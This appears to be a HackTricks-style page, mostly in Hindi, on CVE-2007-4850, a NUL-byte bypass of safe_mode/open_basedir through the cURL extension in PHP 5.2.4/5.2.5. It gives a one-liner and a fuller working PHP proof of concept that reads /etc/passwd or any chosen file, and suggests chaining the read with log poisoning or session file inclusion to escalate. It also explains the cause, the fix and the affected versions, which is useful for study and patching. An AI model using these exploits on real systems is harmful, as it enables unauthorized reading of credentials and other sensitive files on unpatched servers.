PHP 5.2.4 and 5.2.5 PHP cURL

Reading time: 4 minutes

यह पृष्ठ cURL extension का उपयोग करके विशिष्ट PHP 5.2.x builds पर PHP safe_mode/open_basedir जांचों को बायपास करने की एक पुरानी लेकिन CTFs/local-legacy-installs में अभी भी उपयोगी trick का दस्तावेज़ है।

• प्रभावित: PHP 5.2.4 और 5.2.5 जिनमें ext/curl सक्षम है।
• प्रभाव: safe_mode या open_basedir प्रतिबंधों के बावजूद मनमाने स्थानीय फ़ाइलों को पढ़ना (कोई सीधा कोड निष्पादन नहीं)।
• ID: CVE-2007-4850.

स्रोत http://blog.safebuff.com/2016/05/06/disable-functions-bypass/

One-liner PoC

यदि safe_mode या open_basedir सक्रिय हैं और cURL सक्षम है, तो निम्नलिखित वर्तमान स्क्रिप्ट की सामग्री लौटाएगा:

var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__)));

और अधिक स्पष्ट PoC (arbitrary file read)

<?php
// Preconditions (legacy): PHP 5.2.4/5.2.5, safe_mode or open_basedir enabled, ext/curl loaded
$target = '/etc/passwd'; // change to the file you want to read
$ch = curl_init();
// The trick is the NUL byte (\x00). Prefix can be any string; checks are confused and the file after the NUL is read.
curl_setopt($ch, CURLOPT_URL, 'file://prefix'.chr(0).$target);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$resp = curl_exec($ch);
$err  = curl_error($ch);
curl_close($ch);
if ($resp !== false) {
echo $resp; // should contain the target file
} else {
echo "cURL error: $err\n";
}
?>

Notes:

• वास्तविक NUL बाइट इंजेक्ट करने के लिए double quotes या chr(0) का उपयोग करें। Percent-encoding (%00) विश्वसनीय रूप से काम नहीं करेगा।
• यह एक file read primitive है। जहां संभव हो आगे की escalation के लिए अन्य primitives (log poisoning, session file inclusion, आदि) के साथ मिलाकर उपयोग करें।

Why this works (short)

The vulnerability lies in how PHP 5.2.4/5.2.5 performed safe_mode/open_basedir checks for file:// URLs in ext/curl. The check parsed the URL and validated a path component, but due to NUL-byte handling it validated a different string than the one actually used by libcurl. In practice, the validator could approve the path after the NUL while libcurl used the part before the NUL as the URL container, enabling a bypass that results in reading the file placed after the NUL byte. See the original analysis and the affected macro in curl/interface.c for details. [CVE-2007-4850].

Constraints and fixes

• Fixed in later 5.2.x (e.g., distro builds patched to 5.2.6) by correcting the parsing/validation in ext/curl.
• Only affects very old PHP deployments; safe_mode was removed in PHP 5.4 and modern builds do not exhibit this behavior.

See also

Other disable_functions/open_basedir bypasses and modern techniques are collected here:

HackTricks

References

• Ubuntu CVE entry with patch pointers and affected versions: https://ubuntu.com/security/CVE-2007-4850
• Technical writeup with code context (cxsecurity): http://cxsecurity.com/issue/WLB-2008010060